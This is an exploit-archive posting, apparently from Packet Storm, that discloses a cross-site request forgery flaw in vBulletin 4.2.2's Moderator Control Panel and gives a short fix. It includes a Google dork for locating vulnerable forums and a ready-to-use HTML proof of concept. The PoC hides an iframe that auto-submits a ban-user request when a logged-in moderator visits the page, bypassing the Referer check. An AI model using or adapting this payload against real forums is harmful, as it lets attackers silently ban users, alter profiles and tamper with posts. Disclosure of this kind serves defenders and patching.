exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

vBulletin Moderator Control Panel 4.2.2 CSRF

vBulletin Moderator Control Panel 4.2.2 CSRF
Posted Dec 17, 2014
Authored by Daniel Tomescu

The moderator control panel in vBulletin version 4.2.2 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | d0093468efc8039f576bacb81ccbe67d21743e722b5f16641951b6e38db926e1

vBulletin Moderator Control Panel 4.2.2 CSRF

Change Mirror Download
# Exploit Title: vBulletin Moderator Control Panel CSRF
# Google Dork: "Powered by vBulletin® Version 4.2.2"
# Date: 16-12-2014
# Exploit Author: Tomescu Daniel http://daniel-tomescu.com https://rstforums.com/forum
# Vendor Homepage: http://www.vbulletin.com/en/vb4-features/
# Software Link: Premium
# Version: vBulletin 4.2.2
# Tested on: Chrome and Firefox
# Reference: https://rstforums.com/forum/88810-csrf-vbulletin-modcp.rst


### 1. Description

vBulletin Moderator Control Panel suffer from a CSRF vulnerability because the CSRF tokens "adminhash" and "securitytoken" are not verified in POST requests.

vBulletin has one additional protection against CSRF: checking the Referer header to be same origin. However this can be bypassed by making a POST request that does not have a Referer header.

This vulnerability allows an attacker to ban/unban users, to modify user profiles, to edit/approve posts and topics and so on.

### 2. Proof of Concept

The attacker should target a moderator of target-forum.com and the moderator must be logged in Moderator Control Panel. The vulnerability can be exploited by tricking the moderator to visit a webpage that contains the following html code:

<iframe name="ifr" frameborder="0" style="overflow:hidden;height:1%;width:1%" height="1%" width="1%"
src='data:text/html,
<html>
<body>
<iframe style="display:none" name="csrf-frame"></iframe>
<form style="display:none" method="POST" action="https://target-forum.com/path-to/modcp/banning.php?do=dobanuser" target="csrf-frame" id="csrf-form">
<input type="hidden" name="do" value="dobanuser" >
<input type="hidden" name="adminhash" value="" >
<input type="hidden" name="securitytoken" value="" >
<input type="hidden" name="username" value="UserToBeBanned" >
<input type="hidden" name="usergroupid" value="8" >
<input type="hidden" name="period" value="D_7" >
<input type="hidden" name="reason" value="Banned with CSRF" >
<input type="submit" value="submit">
</form>
<script> window.onload = function(){ document.getElementById("csrf-form").submit(); } </script>
</body>
</html>'>
</iframe>

As a result, the user with the username "UserToBeBanned" will be added to the banned users list.

### 3. Solution:

Do not allow POST requests without a Referer header.
Verify "adminhash" and "securitytoken" to be valid.

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close